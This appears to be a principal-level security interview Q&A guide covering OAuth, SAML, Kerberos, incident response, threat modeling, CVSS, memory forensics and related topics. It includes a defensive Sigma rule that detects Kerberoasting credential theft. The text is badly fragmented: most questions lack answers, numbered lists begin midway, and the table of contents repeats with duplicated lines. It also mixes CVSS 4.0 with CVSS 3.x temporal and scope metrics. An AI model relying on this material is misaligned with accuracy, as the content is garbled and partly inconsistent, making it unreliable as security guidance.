Enforcement: Set HttpTokens=required on instances to disable IMDSv1 entirely. Use SCP to enforce IMDSv2-only across the organization.

5. Identity and Access Management

Q5.1: Explain OAuth 2.0 flows. When do you use which?

A: OAuth 2.0 delegates authorization (not authentication) — the client gets a token to access resources on behalf of the user.

Device Authorization Flow: For devices with limited input (smart TVs, CLI tools). Device displays code, user enters it on another device with full browser. Use for: IoT, CLI tools, TV apps.

Q5.2: What is the difference between OAuth and OIDC?

A: OAuth 2.0 is an authorization framework — it grants access tokens to clients to access protected resources. It does NOT define user identity or authentication.

Q5.3: Explain SAML. How does it differ from OIDC?

SAML vulnerabilities: XML signature wrapping attacks (moving the signed element while adding malicious content). XXE in SAML response parsing. Assertion replay if no InResponseTo validation.

Q5.4: What is the difference between RBAC and ABAC? When do you use each?

Q5.5: Explain Kerberos authentication. What are golden and silver ticket attacks?

Q5.6: What is Zero Trust? How do you actually implement it?

Implementation pillars:

Identity: Strong authentication (MFA, phishing-resistant like FIDO2), continuous validation, device posture assessment. Every access request authenticated regardless of network location.

Device: Device health attestation, certificate-based identity, EDR compliance checks. Unmanaged devices get restricted access.

Application: Per-request authorization (not just per-session). Context-aware policies (user identity + device health + location + time + resource sensitivity). API gateway enforcement.

Data: Classification, encryption (at rest, in transit, in use), DLP controls, access logging.

Visibility: Continuous monitoring, SIEM/SOAR integration, behavioral analytics, anomaly detection.

6. Incident Response

Q6.1: Walk through the NIST incident response lifecycle.

A: NIST SP 800-61 defines four phases:

Q6.2: You discover a compromised Linux server. What is your first 30 minutes?

A: First priority: preserve volatile evidence before it's lost.

Q6.3: What is chain of custody and why does it matter?

A: Chain of custody is the documented chronological history of evidence — who collected it, when, how, where it was stored, and who had access to it at every point.

Q6.4: How do you determine the scope and blast radius of a compromise?

A: Start from the known compromised point and work outward:

(3) Data scope: What data was accessible? Database contents, file shares, cloud storage. Check data access logs (S3 access logs, database query logs) for exfiltration indicators.

(6) Indicators of compromise (IOCs): Extract IOCs from known-compromised systems (file hashes, IPs, domains, mutexes, registry keys) and hunt across the entire environment.

Q6.5: When do you involve law enforcement, legal, and external parties?

Insurance/broker: Notify cyber insurance carrier early — most policies have notification windows and approved vendor panels.

Customers/public: Per legal advice and regulatory requirements. Prepare communications in advance. Be transparent about what happened, what data was affected, and what you're doing about it.

7. Security Architecture

Q7.1: Explain defense in depth. Give a concrete example.

A: Defense in depth layers multiple independent security controls so that failure of one control doesn't result in complete compromise. Each layer assumes the previous layer has failed.

Concrete example — protecting a web application:

Layer 1 (Network perimeter): DDoS protection (Cloudflare, AWS Shield), WAF rules (OWASP CRS), rate limiting.

Layer 2 (Network segmentation): Web servers in DMZ, app servers in private subnet, database in isolated subnet. Security groups restrict traffic to only required ports between tiers.

Layer 3 (Application): Input validation, parameterized queries, output encoding, CSP headers, CSRF tokens, authentication/authorization enforcement.

Layer 4 (Data): Encryption at rest (AES-256-GCM), encryption in transit (TLS 1.3), field-level encryption for PII, database access logging.

Layer 5 (Endpoint): OS hardening (CIS benchmarks), EDR agent, host-based firewall, immutable infrastructure (containers rebuilt, not patched).

Layer 6 (Identity): MFA for all access, short-lived credentials, just-in-time access for admin operations, PAM (Privileged Access Management).

Layer 7 (Detection/Response): SIEM correlation, anomaly detection, automated alerting, incident response playbooks, forensic readiness.

Q7.2: How do you design for blast radius containment?

A: Blast radius = the maximum impact of a single failure or compromise. Design goal: ensure that compromising one component cannot lead to compromising the entire system.

(2) Least privilege: Every identity (user, service account, role) has minimum required permissions. Use permission boundaries. Avoid wildcard permissions (*). Separate read and write roles.

(4) Credential isolation: Each service has its own credentials (no shared service accounts). Credentials scoped to minimum required resources. Rotate automatically. No long-lived credentials.

(5) Data compartmentalization: Different encryption keys per data classification level, per tenant, per region. Key compromise exposes only data encrypted with that key.

(6) Failure domains: Distribute across availability zones/regions. Circuit breaker patterns prevent cascading failures. Bulkhead patterns isolate resource pools.

(7) Break-glass procedures: Emergency access that bypasses normal controls but generates high-fidelity alerts and requires post-hoc review.

Q7.3: Design a secure multi-tenant SaaS architecture.

A: Data isolation models:

Silo model: Separate database per tenant. Strongest isolation. Highest cost. Used for highly regulated tenants.
Bridge model: Shared database, separate schemas per tenant. Good isolation with lower cost.
Pool model: Shared tables with tenant_id column. Cheapest. Weakest isolation. Requires rigorous row-level security.

Recommended approach for most cases: Pool model with defense in depth:

Infrastructure: (8) Compute isolation for noisy-neighbor protection (dedicated pods per high-tier tenant). (9) Rate limiting per tenant. (10) Separate egress paths if compliance requires.

Testing: Regularly test cross-tenant access — automated tests that verify tenant A cannot access tenant B's data through any API endpoint.

Q7.4: What is a threat model? Walk through the process.

A: Threat modeling systematically identifies and prioritizes threats to a system. Do it during design, revisit when architecture changes.

Process (STRIDE-per-element):

Step 2: Identify threats. For each element in the DFD, apply STRIDE:

Spoofing (identity): Can an attacker impersonate a legitimate entity? Applies to external entities and processes.
Tampering (integrity): Can data be modified in transit or at rest? Applies to data flows and data stores.
Repudiation (non-repudiation): Can a user deny performing an action? Applies to external entities and processes.
Information Disclosure (confidentiality): Can unauthorized parties access data? Applies to data flows, data stores, and processes.
Denial of Service (availability): Can the component be overwhelmed? Applies to processes and data stores.
Elevation of Privilege (authorization): Can an attacker gain higher privileges? Applies to processes.

Step 4: Mitigate. For each threat: accept, mitigate (implement control), transfer (insurance, SLA), or eliminate (remove the feature). Document the decision.

Step 5: Validate. Verify mitigations are implemented. Test them. Penetration test against identified threats. Update model as system evolves.

Q7.5: How do you secure a CI/CD pipeline?

A: CI/CD pipelines are high-value targets — they have write access to production and often run with elevated privileges.

Runtime: (18) Container runtime security (read-only root filesystem, no privileged containers, Seccomp/AppArmor profiles). (19) Network policies restricting pod-to-pod communication.

Monitoring: (20) Audit logs for all pipeline activities. (21) Alert on: unexpected pipeline executions, pipeline config changes, new service accounts, deploys outside business hours.

8. Risk Management

Q8.1: Explain the FAIR model. How does it differ from qualitative risk assessment?

A: FAIR (Factor Analysis of Information Risk) is a quantitative risk model that expresses risk in financial terms (dollars of expected loss).

Components: Risk = Loss Event Frequency × Loss Magnitude.

Loss Event Frequency = Threat Event Frequency × Vulnerability (probability that a threat event becomes a loss event).
Threat Event Frequency = Contact Frequency × Probability of Action.
Loss Magnitude = Primary Loss (direct costs: response, replacement, fines) + Secondary Loss (reputation damage, customer churn, legal costs).

Q8.2: Explain CVSS scoring. What are its limitations?

A: CVSS (Common Vulnerability Scoring System) rates vulnerability severity 0-10. Current version: CVSS 4.0.

Example: Log4Shell (CVE-2021-44228) = CVSS 10.0 — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Remote, no auth, no interaction, scope change, full CIA impact.

Temporal metrics: Exploit Code Maturity, Remediation Level, Report Confidence. Adjusts score based on current exploit availability and patch status.

Environmental metrics: Modified base metrics for your specific environment. Accounts for compensating controls and asset importance.

Q8.3: What is a risk register? How do you maintain one?

A: A risk register is a structured inventory of identified risks with their assessment, treatment, and ownership.

Q8.4: How do you communicate risk to executives and the board?

A: Executives don't care about CVE numbers or technical details. They care about: business impact, financial exposure, competitive risk, regulatory risk, and what you need from them.

9. Secure Development Lifecycle

Q9.1: What does a mature Secure SDLC look like?

A: Security integrated at every phase, not bolted on at the end:

Requirements: Security requirements derived from threat model. Abuse cases alongside use cases. Compliance requirements identified (PII handling, encryption requirements, audit logging).

Design: Threat modeling (STRIDE) for all new features and architecture changes. Security architecture review for major changes. Selection of vetted frameworks and libraries.

Implementation: Secure coding training for developers. Pre-commit hooks (secrets scanning). IDE plugins for real-time security feedback. Peer code review with security checklist.

Testing: SAST in CI (every PR). SCA for dependency vulnerabilities (every build). DAST in staging. Manual penetration testing for major releases. Fuzz testing for parsers and protocol handlers.

Deployment: IaC security scanning (Checkov, tfsec). Container image scanning. Signed artifacts. Immutable deployments. Secrets injected at runtime, not build time.

Feedback loop: Post-incident analysis feeds back into requirements. Vulnerability trends inform training focus. Metrics drive improvement.

Q9.2: How do you handle a zero-day vulnerability in a critical dependency?

10. Detection Engineering

Q10.1: How do you approach detection engineering for a specific TTP?

A: Start from the attacker's perspective: What must the attacker do that is observable? What artifacts do they create?

(5) Operationalize: Deploy to SIEM/EDR. Create runbook for analysts handling the alert. Set severity based on confidence and impact. Tune false positives with exclusions (document why).

(6) Maintain: Review quarterly. Update for new evasion techniques. Track detection metrics (alerts generated, true positive rate, MTTD).

Q10.2: Write a Sigma rule for detecting Kerberoasting.

title: Kerberoasting - Suspicious TGS Ticket Request
id: a7c5e4b2-3d1f-4e8a-9c6b-2f0d8e7a1b3c
status: experimental
description: >
  Detects excessive Kerberos TGS (Ticket Granting Service) requests
  using RC4 encryption, which may indicate a Kerberoasting attack
  attempting to crack service account passwords offline.
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4769
    TicketEncryptionType: '0x17'  # RC4-HMAC
    Status: '0x0'                 # Success
  filter_machine_accounts:
    ServiceName|endswith: '$'    # Machine accounts use RC4 legitimately
  filter_krbtgt:
    ServiceName: 'krbtgt'
  condition: selection and not filter_machine_accounts and not filter_krbtgt
  # Add count-based threshold in SIEM: >10 events from same source in 5 minutes
falsepositives:
  - Legacy applications requiring RC4 Kerberos tickets
  - Service accounts with SPNs accessed during legitimate batch operations
level: high
tags:
  - attack.t1558.003
  - attack.credential_access

11. Forensics and Evidence

Q11.1: Explain the order of volatility. Why does it matter?

A: Evidence should be collected in order of most volatile to least volatile (RFC 3227):

CPU registers and cache — lost immediately on context switch
Memory (RAM) — running processes, network connections, encryption keys, malware in memory-only. Lost on reboot.
Network state — active connections, ARP cache, routing tables. Changes rapidly.
Running processes — process list, open files, loaded modules.
Disk — files, logs, swap space, slack space. Persists across reboot but can be overwritten.
Remote logging — SIEM, central log servers. Most durable.
Physical evidence — hardware configuration, network cables.

Q11.2: How do you perform memory forensics? What are you looking for?

A: Acquisition: Linux: avml, LiME kernel module, /proc/kcore. Windows: WinPmem, Magnet RAM Capture, DumpIt. Capture to external media or network share — never to the suspect system's disk.

Analysis tool: Volatility 3 (or Rekall). Requires the correct symbol table / profile for the OS version.

What to look for:

(2) Network connections: netscan — active and recently closed connections. Look for: connections to known C2 IPs, unusual ports, established connections from unexpected processes.

(3) Injected code: malfind — detects code injection in process memory (PAGE_EXECUTE_READWRITE regions). hollowfind — detects process hollowing.

(4) DLLs and modules: dlllist, ldrmodules — look for DLLs loaded from unusual paths, unlinked DLLs, DLL search order hijacking.

(5) Handles and registry: handles — open file handles, registry keys, mutexes. hivelist, printkey — registry analysis for persistence.

(6) Command history: cmdscan, consoles — recover command-line history from cmd.exe/PowerShell memory.

(7) Strings extraction: Dump process memory and search for strings — URLs, IPs, credentials, commands.

(8) Timeline: Combine memory artifacts with file system timestamps for comprehensive timeline.

12. Privacy and Compliance

Q12.1: Explain GDPR's key principles and how they affect architecture decisions.

Q12.2: How does data classification drive security controls?

A: Data classification establishes a taxonomy that maps to control requirements:

13. Container and Kubernetes Security

Q13.1: What are the top Kubernetes security risks and mitigations?

(7) Supply chain: Compromised Helm charts, malicious operators. Mitigation: verify chart signatures, review operator permissions, SLSA provenance for container images.

14. Advanced Attacks and Red Team

Q14.1: Explain the differences between penetration testing and red teaming.

Q14.2: What is Pass-the-Hash? How do you detect and prevent it?

Q14.3: Explain supply chain attacks. How do you defend against them?

A: Supply chain attacks compromise a target by infiltrating a trusted third party — software vendor, open source dependency, build system, or hardware manufacturer.

15. Logging, Monitoring, and SIEM

Q15.1: What logs should every organization collect and monitor?

Q15.2: How do you reduce alert fatigue in a SOC?

A: Alert fatigue is the #1 operational problem in security operations. Analysts ignore alerts when the noise is overwhelming.

Root causes: Too many low-fidelity rules, no tuning process, alerts without context, no severity differentiation.

16. Secure Infrastructure

Q16.1: How do you harden a Linux server?

Filesystem: (9) Enable filesystem auditing (auditd). (10) Set umask 027. (11) Immutable flag on critical configs (chattr +i). (12) Separate partitions for /, /var, /home, /tmp.

Monitoring: (19) Deploy EDR/HIDS agent. (20) Central log shipping (rsyslog/journald to SIEM). (21) File integrity monitoring (AIDE, OSSEC).

Baseline: CIS Benchmark for the specific OS distribution. Automate compliance checking with OpenSCAP or Lynis.

Q16.2: What is infrastructure as code (IaC) security?

A: IaC (Terraform, CloudFormation, Pulumi) defines infrastructure declaratively. Security implications:

17. Advanced Topics

Q17.1: What is homomorphic encryption and when is it practical?

A: Homomorphic encryption allows computation on encrypted data without decrypting it. The result, when decrypted, matches the result of performing the computation on plaintext.

Q17.2: Explain side-channel attacks. Give examples and mitigations.

A: Side-channel attacks extract secrets by observing physical characteristics of computation rather than attacking the algorithm itself.

Q17.3: What is SSRF in cloud environments and why is it particularly dangerous?

A: SSRF in cloud environments is more dangerous than in traditional infrastructure because cloud metadata services provide an unauthenticated HTTP API with powerful credentials.

Q17.4: How do you approach securing a microservices architecture?

A: Microservices expand the attack surface — more services, more network communication, more credentials, more things to secure.

Data: Each service owns its data store — no shared databases. Data encrypted at rest with per-service keys. Audit logging of all data access.

API gateway: Central entry point for external traffic. Rate limiting, authentication, input validation, WAF integration. API versioning and deprecation.

Supply chain: Container image scanning, base image standardization, dependency management per service, SBOM generation.

18. Behavioral and Leadership

Q18.1: You disagree with a VP who wants to ship a feature with a known critical vulnerability. What do you do?

Q18.2: How do you build a security culture in an engineering organization?

Q18.3: How do you prioritize a backlog of 500 security findings?

19. Emerging Threats and Advanced Concepts

Q19.1: What is the impact of quantum computing on cryptography?

Q19.2: What is a confused deputy attack?

A: A confused deputy attack occurs when a trusted, privileged program is tricked into misusing its authority by a less-privileged attacker.

20. Practical Scenarios

Q20.1: Design the authentication system for a new banking application.

Q20.2: Your SIEM alert shows a spike in DNS queries to a single domain from 15 different internal hosts. Walk through your investigation.

If benign: (14) Document the false positive. (15) Tune the alert rule (add exception for the domain if legitimate, adjust threshold).

Post-analysis: (16) If malware: determine patient zero, full scope assessment, eradicate across all affected hosts, block all associated IOCs, update detection rules. (17) Report to stakeholders.

Q20.3: You're asked to assess the security of a third-party SaaS vendor that will handle customer PII. What do you evaluate?

21. Cryptographic Protocol Analysis

Q21.1: Walk through the TLS 1.3 handshake in detail.

A: TLS 1.3 achieves 1-RTT handshake (vs 2-RTT in TLS 1.2):

ServerHello: Server sends: chosen cipher suite, chosen group, server's key_share (ECDHE public key). From this point, both sides can compute the shared secret and derive handshake keys.

Encrypted extensions: (encrypted with handshake keys) Server sends additional parameters: ALPN negotiation, server name acknowledgment.

Certificate: Server's certificate chain.

Finished: HMAC over the handshake transcript. Confirms handshake integrity and key confirmation.

Client Finished: Client sends Finished message. Both sides derive application traffic keys from the handshake.

Q21.2: What are the security implications of JWT?

A: JWT structure: Header.Payload.Signature (Base64URL encoded). The payload is NOT encrypted — it's just encoded. Anyone can read JWT claims.

22. Operating Systems and Exploitation

Q22.1: What is ASLR and how can it be bypassed?

Defense: Enable ASLR system-wide + compile all binaries as PIE + high entropy ASLR (on Linux: randomize_va_space=2) + stack canaries + DEP/NX + CFI (Control Flow Integrity).

Q22.2: What is the difference between SELinux and AppArmor?

A: Both are Linux Mandatory Access Control (MAC) systems implemented as Linux Security Modules (LSM).

23. Security Automation and DevSecOps

Q23.1: How do you implement security guardrails that don't slow down developers?

A: The goal is to make the secure path the easy path:

(1) Pre-commit: Secrets scanning (trufflehog, gitleaks) — blocks credential commits instantly. Fast, prevents the most embarrassing class of vulnerability.

(6) Self-service: Security tooling dashboard where developers can see their own findings, understand them, and track remediation. Don't make developers open tickets to get security feedback.

24. Network Protocols Deep Dive

Q24.1: How does BGP work and what are the security risks?

Q24.2: What is DNS over HTTPS (DoH) and what are the security implications?

A: DoH encrypts DNS queries inside HTTPS (port 443), making them indistinguishable from regular web traffic.

Summary

This document covers 120+ topics across the full spectrum expected at principal-level security engineering interviews. Key areas:

Network security: OSI model, TCP/IP, DNS, ARP, routing, IDS/IPS
Cryptography: Symmetric/asymmetric, KDFs, PKI, TLS 1.3, PFS, HMAC, block cipher modes
Application security: OWASP Top 10, XSS, CSRF, SSRF, SQLi, deserialization, code review, SAST/DAST
Cloud security: Shared responsibility, IAM, network isolation, IMDS, key management
Identity: OAuth/OIDC, SAML, Kerberos, RBAC/ABAC, Zero Trust
Incident response: NIST lifecycle, evidence volatility, chain of custody, blast radius, legal/regulatory
Architecture: Defense in depth, blast radius containment, multi-tenant security, threat modeling, CI/CD security
Risk management: FAIR model, CVSS, risk registers, executive communication
Detection engineering: TTP-based detection, Sigma rules, alert fatigue, SOC operations
Forensics: Memory forensics, disk forensics, order of volatility
Advanced topics: Post-quantum crypto, side channels, supply chain attacks, microservices security, BGP security

Security Mastery — Principal-Level Interview Q&A

Security Mastery — Principal-Level Interview Q&A

1. Network Security Fundamentals

Q1.1: Walk through what happens when you type https://example.com into a browser, focusing on the security-relevant steps.

Q1.2: Explain the difference between TCP and UDP. When would you choose one over the other from a security perspective?

Q1.3: How does DNS exfiltration work and how do you detect it?

Q1.4: Explain ARP spoofing. What is the blast radius and how do you mitigate it?

Q1.5: What is the difference between a router, a switch, and a firewall? Where does each sit in a defense-in-depth architecture?

Q1.6: Explain subnetting. How does it relate to security?

Q1.7: What is the difference between IDS and IPS? What are the detection modes?

2. Cryptography

Q2.1: Explain the difference between symmetric and asymmetric encryption. Why do we use both in TLS?

Q2.2: What is Perfect Forward Secrecy (PFS) and why does it matter?

Q2.3: Explain hashing vs. encryption vs. encoding. When do you use each?

Q2.4: How should passwords be stored? Walk through the full chain.

Q2.5: What is a Key Derivation Function (KDF) and what are the different types?

Q2.6: Explain PKI. What happens when a CA is compromised?

Q2.7: What is the difference between Diffie-Hellman and RSA key exchange?

Q2.8: What are block cipher modes of operation? Which should you use?

Q2.9: What is HMAC and why is it better than hash(key || message)?

3. Application Security

Q3.1: Walk through the OWASP Top 10 2025. What changed and why?

Q3.2: Explain XSS types and their mitigations.

Q3.3: Explain CSRF and why SameSite cookies changed the landscape.

Q3.4: What is SSRF and how do you prevent it?

Q3.5: Explain SQL injection. What are the variants and how do you prevent it?

Q3.6: What is insecure deserialization and why is it dangerous?

Q3.7: How would you conduct a security code review?

Q3.8: What is the difference between SAST, DAST, IAST, and SCA?

4. Cloud Security

Q4.1: Explain the shared responsibility model. Where do most breaches occur?

Q4.2: An AWS access key is leaked on GitHub. Walk through your response.

Q4.3: How do you design network isolation in AWS?

Q4.4: What are the most critical AWS IAM security controls?

Q4.5: Explain the IMDSv1 vs IMDSv2 difference and why it matters.

5. Identity and Access Management

Q5.1: Explain OAuth 2.0 flows. When do you use which?

Q5.2: What is the difference between OAuth and OIDC?

Q5.3: Explain SAML. How does it differ from OIDC?

Q5.4: What is the difference between RBAC and ABAC? When do you use each?

Q5.5: Explain Kerberos authentication. What are golden and silver ticket attacks?

Q5.6: What is Zero Trust? How do you actually implement it?

6. Incident Response

Q6.1: Walk through the NIST incident response lifecycle.

Q6.2: You discover a compromised Linux server. What is your first 30 minutes?

Q6.3: What is chain of custody and why does it matter?

Q6.4: How do you determine the scope and blast radius of a compromise?

Q6.5: When do you involve law enforcement, legal, and external parties?

7. Security Architecture

Q7.1: Explain defense in depth. Give a concrete example.

Q7.2: How do you design for blast radius containment?

Q7.3: Design a secure multi-tenant SaaS architecture.

Q7.4: What is a threat model? Walk through the process.

Q7.5: How do you secure a CI/CD pipeline?

8. Risk Management

Q8.1: Explain the FAIR model. How does it differ from qualitative risk assessment?

Q8.2: Explain CVSS scoring. What are its limitations?

Q8.3: What is a risk register? How do you maintain one?

Q8.4: How do you communicate risk to executives and the board?

9. Secure Development Lifecycle

Q9.1: What does a mature Secure SDLC look like?

Q9.2: How do you handle a zero-day vulnerability in a critical dependency?

10. Detection Engineering

Q10.1: How do you approach detection engineering for a specific TTP?

Q10.2: Write a Sigma rule for detecting Kerberoasting.

11. Forensics and Evidence

Q11.1: Explain the order of volatility. Why does it matter?

Q11.2: How do you perform memory forensics? What are you looking for?

12. Privacy and Compliance

Q12.1: Explain GDPR's key principles and how they affect architecture decisions.

Q12.2: How does data classification drive security controls?

13. Container and Kubernetes Security

Q13.1: What are the top Kubernetes security risks and mitigations?

14. Advanced Attacks and Red Team

Q14.1: Explain the differences between penetration testing and red teaming.

Q14.2: What is Pass-the-Hash? How do you detect and prevent it?

Q14.3: Explain supply chain attacks. How do you defend against them?

15. Logging, Monitoring, and SIEM

Q15.1: What logs should every organization collect and monitor?

Q15.2: How do you reduce alert fatigue in a SOC?

Q1.1: Walk through what happens when you type `https://example.com` into a browser, focusing on the security-relevant steps.

Q2.9: What is HMAC and why is it better than `hash(key || message)`?

Q1.1: Walk through what happens when you type `https://example.com` into a browser, focusing on the security-relevant steps.

Q2.9: What is HMAC and why is it better than `hash(key || message)`?